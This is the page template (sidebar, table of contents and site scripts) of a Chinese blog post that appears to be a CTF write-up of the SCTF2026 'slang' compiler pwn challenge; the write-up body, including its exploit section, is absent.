          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav" aria-label="Mobile navigation">
  <div class="sidebar-wrap">
        <div class="sidebar-toc-sidebar"><h3 class="toc-title">文章目录</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
    <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#serve-py"><span class="toc-number">1.</span> <span class="toc-text">serve.py</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#runtime-c"><span class="toc-number">2.</span> <span class="toc-text">runtime.c</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%AF%B9%E4%BA%8E-runtime-c-%E7%9A%84%E6%80%9D%E8%80%83"><span class="toc-number">2.1.</span> <span class="toc-text">对于 runtime.c 的思考</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%8E%A2%E6%B5%8B%E9%BB%91%E7%9B%92%E7%BC%96%E8%AF%91%E5%99%A8%EF%BC%9A"><span class="toc-number">3.</span> <span class="toc-text">探测黑盒编译器：</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%A7%84%E5%AE%9A-main-%E5%87%BD%E6%95%B0%EF%BC%8C%E8%BF%94%E5%9B%9E-int-%E7%B1%BB%E5%9E%8B"><span class="toc-number">3.1.</span> <span class="toc-text">规定 main 函数，返回 int 类型</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%B7%BB%E5%8A%A0%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F"><span class="toc-number">3.2.</span> <span class="toc-text">添加局部变量</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%AA%8C%E8%AF%81%E5%A4%9A%E4%B8%AA%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F"><span class="toc-number">3.3.</span> <span class="toc-text">验证多个局部变量</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95%E4%BC%A0%E5%85%A5%E5%8F%82%E6%95%B0%EF%BC%9A"><span class="toc-number">3.4.</span> <span class="toc-text">尝试传入参数：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%B1%BB%E5%9E%8B%EF%BC%9A"><span class="toc-number">3.5.</span> <span class="toc-text">尝试字符串类型：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%AA%8C%E8%AF%81-vec-%E7%B1%BB%E5%9E%8B%E4%BB%A5%E5%8F%8A-vec-new%EF%BC%9A"><span class="toc-number">3.6.</span> <span class="toc-text">验证 vec 类型以及 vec_new：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%AA%8C%E8%AF%81-scribble%EF%BC%9A"><span class="toc-number">3.7.</span> <span class="toc-text">验证 scribble：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%AA%8C%E8%AF%81-if"><span class="toc-number">3.8.</span> <span class="toc-text">验证 if</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%BB%91%E7%9B%92%E7%BC%96%E8%AF%91%E5%99%A8%E6%80%BB%E7%BB%93%EF%BC%9A"><span class="toc-number">3.9.</span> <span class="toc-text">黑盒编译器总结：</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#EXP-%E7%BC%96%E5%86%99%EF%BC%9A"><span class="toc-number">4.</span> <span class="toc-text">EXP 编写：</span></a></li></ol>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/HFTTC.github.io/avatar/head.jpg" data-sizes="auto" alt="HFTTC" class="lazyload">
  <div class="sidebar-author-name">HFTTC</div>
  <div class="sidebar-description">心之所向，无问西东</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">137</div>
  </div>
</div>
<div class="sidebar-social" >
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/IDCM-svg itemprop="url" target="_blank" aria-label="github" rel="noopener nofollow noreferrer"></a>
    </div>
</div>
<div class="sidebar-menu">
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/" aria-label="首页"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/catalog" aria-label="目录"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">目录</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/notice" aria-label="公告"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">公告</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/friend" aria-label="友链"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/archives" aria-label="归档"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/about" aria-label="关于"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
</div>
</div>
  </div>
      <div class="sidebar-btn-wrapper">
        <div class="sidebar-toc-btn current"></div>
        <div class="sidebar-common-btn"></div>
      </div>
</nav>

    </div>
      <div class="site-search">
        <div class="reimu-popup popup">
          <div class="reimu-search">
            <div class="reimu-search-input-icon"></div>
            <div id="reimu-search-input"></div>
            <div class="popup-btn-close"></div>
          </div>
          <div class="reimu-results">
            <div id="reimu-stats"></div>
            <div id="reimu-hits"></div>
            <div id="reimu-pagination" class="reimu-pagination"></div>
          </div>
          <img class="reimu-bg" src="/HFTTC.github.io/images/reimu.png" loading="lazy" decoding="async" fetchpriority="low"/>
        </div>
      </div>
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="/HFTTC.github.io/js/lazyload-local.js"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>




<script src="/HFTTC.github.io/js/script.js"></script>


  
<script src="/HFTTC.github.io/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>


<script src="/HFTTC.github.io/js/pjax_script.js" data-pjax></script>


  
<script src="/HFTTC.github.io/js/generator_search.js" defer></script>



  <script>
    var setupFirework = () => {
      if (!false || !window.matchMedia('(max-width: 768px)').matches) {
        window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["var(--red-1)","var(--red-2)","var(--red-3)","var(--red-4)"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["var(--red-0)"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'));
      }
    }
  </script>
  
<script src="https://npm.webcache.cn/mouse-firework@0.2.0/dist/index.umd.js" integrity="sha384-qi9WggRt19tv8Vc7pCHW3ulMNLwrn515zaLEWZjl1px07vz8+pUoWX8n1rgq282T" crossorigin="anonymous" onload="setupFirework()" defer></script>






<div id="lazy-script">
  <div>
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "HFTTC",
          title: "SCTF2026 slang",
          url: "https://idcm-svg.github.io/HFTTC.github.io/2026/06/19/SCTF2026%20slang/",
          excerpt: "",
          description: "",
          stripContent: "这道题目的逻辑并不算难，一道新型编译器也算是拓展眼界了。wp 写得会比较长，实际上并没有那么难。 不过也有点难受，就是你要新认识一个编译器，并编写出相应的代码进行篡改攻击 emmmm…… 本质还是利用指针篡改 got 表    serve.py12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686",
          date: "Fri Jun 19 2026 21:35:22 GMT+0800",
          updated: "Fri Jun 19 2026 22:35:55 GMT+0800",
          cover: "/HFTTC.github.io/images/pwn/covers/sctf2026-slang.jpg",
        };
      </script>
        
<script src="/HFTTC.github.io/js/insert_highlight.js" data-pjax></script>

      
<script src="/HFTTC.github.io/js/tabs.js" data-pjax defer></script>

      <script type="module" data-pjax>
        (async () => {
          const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
          const initPswp = (gallery, children) => {
            if (_$$(`${gallery} ${children}`).length > 0) {
              new PhotoSwipeLightbox({
                gallery,
                children,
                pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
              }).init();
            }
          }
          const pswp = () => {
            initPswp('.article-entry', 'a.article-gallery-item');
            initPswp('.article-gallery', 'a.article-gallery-item');
          }
          pswp();
        })();
      </script>
        

<script data-pjax>
  var loadScript = (src, integrity) => {
    const script = document.createElement('script');
    script.src = src;
    if (integrity) script.integrity = integrity;
    script.crossOrigin = 'anonymous';
    return script;
  };

  var commentConfigKeys = ["utterances"];
  var commentConfig = {
    utterances: {
      enable: true,
      load: () => {
        const container = document.querySelector('.utterances-comment'); 
        if (!container) return;
        container.style.display = 'block';

        let theme = 'auto';
        const parsedTheme = theme === 'auto' ? (document.documentElement.getAttribute('data-theme') === 'dark' ? 'github-dark' : 'github-light') : theme;

        // 创建 utterances 脚本
        const script = document.createElement('script');
        script.src = 'https://utteranc.es/client.js';
        script.setAttribute('repo', 'IDCM-svg/HFTTC.github.io');
        script.setAttribute('issue-term', 'pathname');
        script.setAttribute('theme', parsedTheme);
        script.setAttribute('crossorigin', 'anonymous');
        script.async = true;

        // 清空容器（防止重复加载）并插入脚本
        container.innerHTML = '';
        container.appendChild(script);
        if (theme === 'auto') {
          const themeHandler = (e) => {
            const iframe = container.querySelector('iframe.utterances-frame');
            if (!iframe || !iframe.contentWindow) {
              document.body.removeEventListener('reimu:theme-set', themeHandler);
              return;
            }
            iframe.contentWindow.postMessage({ type: 'set-theme', theme: e.detail.isDark ? 'github-dark' : 'github-light' }, 'https://utteranc.es');
          };
          document.body.addEventListener('reimu:theme-set', themeHandler);
        }
      }
    },
  }
  commentConfig.enable = commentConfigKeys.some(key => commentConfig[key].enable);

  var defaultComment = '';
  if (commentConfig.enable) {
    // 1. 首先检查localStorage中是否有保存的评论类型
    var savedCommentType = localStorage.getItem('commentType');
    
    // 2. 如果localStorage中有值且对应的评论系统可用，就使用它
    if (savedCommentType) {
      if (commentConfig[savedCommentType]?.enable) {
        defaultComment = savedCommentType;
      }
    }
    
    // 3. 如果localStorage无效，检查配置的默认评论系统
    if (!defaultComment) {
      var configDefault = 'utterances';
      if (commentConfig[configDefault]?.enable) {
        defaultComment = configDefault;
      }
    }
    
    // 4. 如果前两项都无效，按指定顺序找到第一个可用的评论系统
    if (!defaultComment) {
      defaultComment = commentConfigKeys.find(sys => commentConfig[sys].enable) || '';
    }
  }
  function loadComments() {
    if (!commentConfig.enable) return;
    const loadedComments = {
      valine: false,
      waline: false,
      twikoo: false,
      gitalk: false,
      giscus: false,
      utterances: false,
      beaudar: false,
      disqus: false,
    };

    // 隐藏所有评论容器
    const hideAllComments = () => {
      const commentContainers = document.querySelectorAll('.comment');
      commentContainers.forEach(container => {
        container.style.display = 'none';
      });
    };

    // 按需加载评论系统
    const loadCommentSystem = (type) => {
      if (loadedComments[type]) {
        // 如果已加载，只需显示对应容器
        document.querySelector(`.${type}-comment`).style.display = 'block';
        return;
      }

      // 根据类型加载对应的脚本
      commentConfig[type]?.load();
      loadedComments[type] = true;
    };

    // 评论组件选择器
    const changeActiveCommentItems = (item) => {
      const commentItems = document.querySelectorAll('.selector-item');
      for (let i = 0; i < commentItems.length; i++) {
        commentItems[i].classList.remove('active');
      }
      item.classList.add('active');

      // 获取要加载的评论系统类型
      const commentType = item.getAttribute('data-selector');

      // 隐藏所有评论系统
      hideAllComments();

      // 加载选中的评论系统
      loadCommentSystem(commentType);
    };

    const commentInit = () => {
      // 评论组件选择器点击事件
      const commentItems = document.querySelectorAll('.selector-item');
      for (let item of commentItems) {
        item.addEventListener('click', () => {
          // 保存选择器状态
          const commentType = item.getAttribute('data-selector');
          window.localStorage.setItem('commentType', commentType);
          // 切换选中状态
          changeActiveCommentItems(item);
        });
      }

      // 检查是否需要加载默认评论系统
      if (defaultComment) {
        const defaultSelectorItem = document.querySelector(`[data-selector="${defaultComment}"]`);
        if (!defaultSelectorItem) return;
        defaultSelectorItem.style.display = 'block';
        defaultSelectorItem.classList.add('active');
        loadCommentSystem(defaultComment);
      }
    }

    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', commentInit);
    } else {
      commentInit();
    }
  };
  loadComments();
</script>

  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.12.3' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  


  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>


<script>
  if ('serviceWorker' in navigator) {
    Promise.all([
      navigator.serviceWorker.getRegistrations().then((registrations) => {
        return Promise.all(registrations.map((registration) => registration.unregister()));
      }),
      ('caches' in window)
        ? caches.keys().then((keys) => Promise.all(keys.map((key) => caches.delete(key))))
        : Promise.resolve()
    ]).then(() => {
      if (!sessionStorage.getItem('sw-cache-cleared')) {
        sessionStorage.setItem('sw-cache-cleared', '1');
        window.location.reload();
      }
    });
  }
</script>




  </body>
  </html>
